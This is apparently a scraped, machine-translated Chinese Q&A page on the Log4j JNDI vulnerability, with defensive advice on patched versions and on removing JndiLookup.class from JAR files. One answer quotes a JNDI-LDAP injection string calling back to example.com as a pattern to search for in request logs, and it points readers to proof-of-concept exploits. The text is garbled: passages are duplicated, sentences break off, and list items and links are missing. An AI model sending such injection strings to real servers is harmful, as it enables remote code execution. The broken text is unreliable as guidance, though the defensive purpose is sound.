最近报告了一个log4j漏洞:
igetnqfo1#
请记住,始终从下列资源中查找最新信息
CVE-2021-45105... 2.16.0和2.12.2不再是有效的修正!当前的修正版本是2.17.0(Java 8)和2.12.3(Java 7)。所有其他Java版本都必须采取权宜之计(从log4j-core JAR中删除JndiLookup.class文件)。
我已经相应地更新了我下面的消息。
直接回答问题:
Reddit thread: log4j_0day_being_exploited有几个资源可以帮助您。检测漏洞
Vendor Advisories
.class and .jar recursive hunter
Vulnerability Detection
检测漏洞...这是更复杂的,我所做的就是直到你
虽然大多数需要知道的人可能已经知道足够做他们需要做的事情,但我想我还是会把这个以防万一...
基本上
zip
zip -q -d "$LOG4J_JAR_PATH" org/apache/logging/log4j/core/lookup/JndiLookup.class
.zip
\\path\\to\\unzippedFolder\\org\\apache\\logging\\log4j\\core\\lookup\\JndiLookup.class
.jar
如果您只有1或2个JAR文件需要处理,并且您不介意安装7-zip或您有PowerShell来完成此操作,这是没问题的。但是,如果您有很多JAR文件,或者如果您不想安装7-zip,并且无法访问Power Shell,我创建了一个开源VBS脚本,它将为您完成此操作,而无需安装任何其他软件。https://github.com/CrazyKidJack/Windowslog4jClassRemover阅读README和发行说明https://github.com/CrazyKidJack/Windowslog4jClassRemover/releases/latest
9jyewag02#
如果您看到类似以下内容的内容,则可以检查请求日志:
{jndi:ldap://example.com:1234/callback}
如果你想检查你是否会被攻击,你可以从Github运行一个POC。这个link似乎是第一个发布的POC。你现在可以找到其他的。你也可以找到一个黑盒测试here。
2条答案
按热度按时间igetnqfo1#
更新时间:2021年12月18日......
请记住,始终从下列资源中查找最新信息
CVE-2021-45105... 2.16.0和2.12.2不再是有效的修正!当前的修正版本是2.17.0(Java 8)和2.12.3(Java 7)。所有其他Java版本都必须采取权宜之计(从log4j-core JAR中删除JndiLookup.class文件)。
我已经相应地更新了我下面的消息。
直接回答问题:
Reddit thread: log4j_0day_being_exploited有几个资源可以帮助您。
检测漏洞
Vendor Advisories
。检查这些列表以查看您是否正在运行任何该软件。如果您正在运行并且有适用于它的更新,请更新。.class and .jar recursive hunter
。在那里运行程序,如果它发现任何修复。Vulnerability Detection
使用cntl + f检测漏洞...这是更复杂的,我所做的就是直到你
Vendor Advisories
...搜索那里的东西...不确定哪个选项最适合你修正:
虽然大多数需要知道的人可能已经知道足够做他们需要做的事情,但我想我还是会把这个以防万一...
截至2021年12月18日
基本上
zip
命令的一行程序,默认情况下,该命令与大多数Linux发行版打包在一起。zip -q -d "$LOG4J_JAR_PATH" org/apache/logging/log4j/core/lookup/JndiLookup.class
.zip
.zip
)\\path\\to\\unzippedFolder\\org\\apache\\logging\\log4j\\core\\lookup\\JndiLookup.class
.jar
如果您只有1或2个JAR文件需要处理,并且您不介意安装7-zip或您有PowerShell来完成此操作,这是没问题的。但是,如果您有很多JAR文件,或者如果您不想安装7-zip,并且无法访问Power Shell,我创建了一个开源VBS脚本,它将为您完成此操作,而无需安装任何其他软件。https://github.com/CrazyKidJack/Windowslog4jClassRemover
阅读README和发行说明https://github.com/CrazyKidJack/Windowslog4jClassRemover/releases/latest
9jyewag02#
如果您看到类似以下内容的内容,则可以检查请求日志:
如果你想检查你是否会被攻击,你可以从Github运行一个POC。这个link似乎是第一个发布的POC。你现在可以找到其他的。
你也可以找到一个黑盒测试here。